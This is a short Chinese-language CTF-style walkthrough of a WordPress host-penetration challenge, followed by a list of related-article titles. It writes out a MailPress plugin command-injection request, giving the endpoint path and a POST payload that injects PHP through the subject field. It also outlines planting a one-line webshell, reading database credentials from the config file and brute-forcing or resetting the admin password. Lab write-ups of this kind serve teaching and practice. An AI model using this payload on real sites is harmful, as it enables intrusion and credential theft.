主机渗透——CRC_3_PENTEST_2_WORDPRESS
1. 该题使用的是wordpress框架,可以利用WPScan进行扫描
注意:带着token才能扫描出漏洞
WPScan的使用教程可以参考:https://blog.csdn.net/guo15890025019/article/details/118548932
在这里利用mailpress插件的命令执行漏洞,越权执行命令
2. 利用漏洞
http:// IP地址 /wp-content/plugins/mailpress/mp-includes/action.php
利用hackbar或者burp suite进行post的数据传入
参数:
action=autosave&id=0&revision=-1&toemail=&toname=&fromemail=&fromname=&to_list=1&Theme=&subject=<?php phpinfo();?>&html=&plaintext=&mail_format=standard&autosave=1
在这里可以上传一句话木马,用于获取webshell,可以通过查看conf配置文件获取到数据库的用户名和密码,登录数据库
可以通过猜密码,爆破密码,直接修改数据库中密码的方式,登录后台
主机渗透——CRC_3_PENTEST_2_WORDPRESS相关推荐
- 【工具-NMAP】主机渗透神器:NMAP (功能介绍,安装,使用,参数完整翻译)-转载
1 nmap 介绍 Nmap (网络映射器)是由 Gordon Lyon设计,用来探测计算机网络上的主机和服务的一种 安全扫描器.为了绘制网络拓扑图,Nmap的发送特制的数据包到目标主机,然后对返回 ...
- windows powershell实战指南_【安全研究】powershell在主机中是否存在安全隐患?
近日,安全狗海青实验室在研究powershell攻击运用到主机实战场景时,对powershell在主机中是否存在安全问题进行了一次较为全面的分析,并介绍了powershell从灰色工具逐步演变成为攻击 ...
- 修改Linux主机名和IP
问题描述 又到了例行的系统安全测试时间,公司部署的一套系统需要做安全测试了,首先要做主机渗透,显然不可能在正式环境直接测,于是就把几台服务器做了个镜像,作为测试环境. 现在问题是,测试环境的ip要修改 ...
- 利用手机作为渗透工具的一些思路
前言: 一直有捣鼓手机渗透的想法 手机渗透的好处在我看来就是:便于携带,便于隐藏攻击 毕竟近缘渗透的话 使用电脑的话 太容易暴露了 研究了下最近几年常见的一些app和思路 像以前的zanti和dspl ...
- 2023年渗透测试都需要学习哪些内容?
这个问题,说实话,在2019年之前,其实关注信息安全相关的人并不多,对于市场来讲,信息安全的需求量也不是很大.但大家都知道,在中国,随着时代和技术的发展,信息安全越来越受到重视,一步一步上升到国家战略 ...
- 看完这篇 教你玩转渗透测试靶机vulnhub——DC1
Vulnhub靶机DC1渗透测试详解 Vulnhub靶机介绍: Vulnhub靶机下载: Vulnhub靶机安装: Vulnhub靶机漏洞详解: ①:信息收集: ②:漏洞发现: ③:漏洞利用: ④:S ...
- 我猜你也在找内网渗透,这篇难道还不够你嚼烂?
内网渗透 前言 1.实验简介 网络拓扑图 2.环境搭建 第一层网络 第二层网络 第三层网络 最后 第一台Linux 第二台Linux 3.实验过程 第一层靶机 蚁剑连接 进一步做内网渗透,上传msf后 ...
- 一个实验了解多层内网渗透
原创:锦行安全平台部zy 近年来,攻击者潜伏在企业内网进行攻击的安全事件屡见不鲜,攻击者在经常会企业的内网进行横向渗透,令防守方防不胜防.因此,我们应该严格控制好网络区域之间的访问规则,加大攻击横向渗 ...
- 看完这篇 教你玩转渗透测试靶机vulnhub——DC3
Vulnhub靶机DC3渗透测试详解 Vulnhub靶机介绍: Vulnhub靶机下载: Vulnhub靶机安装: Vulnhub靶机漏洞详解: ①:信息收集: ②:漏洞发现: ③:SQL注入: ④: ...
最新文章
- windows程序设计之对话框简介1
- python输出命令_Python输出各行命令详解
- 2017年度NLP领域论文TOP10(附链接)
- 「杂谈」计算机视觉人脸图像的十几个大的应用方向,你懂了几分?
- c# winform InvokeRequired 解决跨线程访问控件
- 用咨询的角度去实施软件项目
- 作者:刘建楠(1963-),男,就职于中国石油庆阳石化公司
- .NET连接SAP系统专题:C#如何导入内文至SAP(十一)
- ​为什么你应该申请去小型的初创公司实习?
- RapidMiner 数据读写
- Tensorflow分布式机器学习平台
- html转换到pdf转换器,HTML转换到PDF转换器
- 微信小程序_map组件实现定位
- html5文档样式,jQuery HTML5文件上传美化插件jQuery.filer
- uni-app AppStore推广内购、SKPaymentTransactionObser
- 网络:简述对5G网络切片的认识
- YUV图解 (YUV444, YUV422, YUV420, YV12, NV12, NV21)
- c语言的文法,c语言实现First文法
- windows下启动redis命令(笔记)
- ITFriend创业败局(一):选择创业方向和寻找合伙人,创业失败的2个关键点